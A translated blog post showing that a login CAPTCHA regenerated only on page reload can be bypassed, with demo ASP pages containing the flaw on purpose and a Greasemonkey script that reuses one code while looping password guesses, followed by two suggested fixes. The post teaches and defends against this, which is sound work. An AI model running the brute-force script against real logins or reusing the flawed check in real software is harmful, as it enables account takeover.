Greasemonkey makes the website login verification code useless

Generally, to make brute-force password guessing harder, we add a verification code to the login form. The code is kept on the server side and shown to the client as an image:

The flow is the same throughout the login process: when a user opens the login page, the server generates a verification code. After the user clicks the login button, the request goes to the login handler, which checks whether the verification code entered by the user is correct. If it is wrong, the user is sent back to the login page, which generates a new verification code for the next attempt. Note: the only thing that triggers a new verification code is a reload of the login page!

I never saw a problem with this before. After I studied the 12306 automatic login script today, I realised how serious it is. With Greasemonkey the verification code can simply be ignored, because a Greasemonkey script can submit the form with Ajax: the login page is never refreshed, so the server never generates a new verification code. The verification code therefore only has to be entered by hand once, after which the script can keep trying to log in, guessing the username and password!

1. Demonstration of Greasemonkey automatic login

To keep the code short, the example below does not render the verification code as an image; the value stored in the session is written straight into the page. The effect is the same and the conclusion is not affected.

Default.asp:

<%@ Language="VBScript" CodePage="65001" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Login demonstration</title>
</head>

<body>
<%
Randomize
Session("Passcode") = Int(8999 * Rnd + 1000)  ' generate the verification code; only runs when this page is loaded
%>
<form id="form1" name="form1" method="post" action="login.asp">
Username: <input type="text" name="txtusn" id="txtusn" /><br />
Password: <input type="text" name="txtusp" id="txtusp" /><br />
Verification code: <input type="text" name="txtpasscode" id="txtpasscode" /> <%= Session("Passcode") %><br />
<input type="submit" name="btn1" id="btn1" value="Submit" />
</form>
</body>
</html>

login.asp:

<%
Response.Charset = "UTF-8"

Dim usn, usp, code, msg
usn = Request.Form("txtusn")
usp = Request.Form("txtusp")
code = Request.Form("txtpasscode")

Response.Write(Login(usn, usp, code))

' Login function
Function Login(usn, usp, code)
    If Session("Login") = True Then
        Login = "Login successful."
    Else
        If usn <> "" And usp <> "" Then
            ' The code is compared but never regenerated here, so the same
            ' code stays valid for every further attempt until default.asp is reloaded
            If code <> CStr(Session("Passcode")) Then
                Login = "Verification code error. Please enter it again."
                Exit Function
            End If

            If usn = "admin" And usp = "admin888" Then
                Session("Login") = True
                Login = "Login successful."
            Else
                Login = "User name or password error. Please enter them again."
            End If
        Else
            Login = "The user has not logged on."
        End If
    End If
End Function
%>

Greasemonkey script:

// ==UserScript==
// @name        Automatic Login
// @namespace   com.mzwu
// @include     http://localhost/default.asp
// @require     https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
// ==/UserScript==

if (typeof($) != "undefined")
{
    $("body").append("<input type=\"button\" name=\"btn2\" id=\"btn2\" value=\"Login test\" />");

    $("#btn2").click(function () {
        var usn = "admin";
        var usp = "";
        var code = $("#txtpasscode").val();   // the code shown once on the page, reused for every request
        var responseText = "";
        var i = 0;

        while (responseText.indexOf("Login successful") == -1)
        {
            usp = "admin88" + (++i);   // password guessing
            $.ajax({
                type: "POST",
                url: "login.asp?r=" + Math.random(),   // cache-buster; the page itself is never reloaded
                data: "txtusn=" + usn + "&txtusp=" + usp + "&txtpasscode=" + code,
                async: false,
                success: function (msg) {
                    responseText = msg;
                    if (responseText.indexOf("Login successful") != -1)
                    {
                        alert("Login successful. Attempts: " + i);
                        location.href = "login.asp";
                    }
                }
            });
        }
    });
}

Test results:
[screenshot not reproduced in this copy]

2. Solution

Two solutions are offered for reference:

Method 1: whenever the username or password check fails, the server forcibly generates a new verification code, so every further attempt needs a fresh code;
Method 2: after five failed login attempts, the account is locked for a period of time and cannot be logged into;

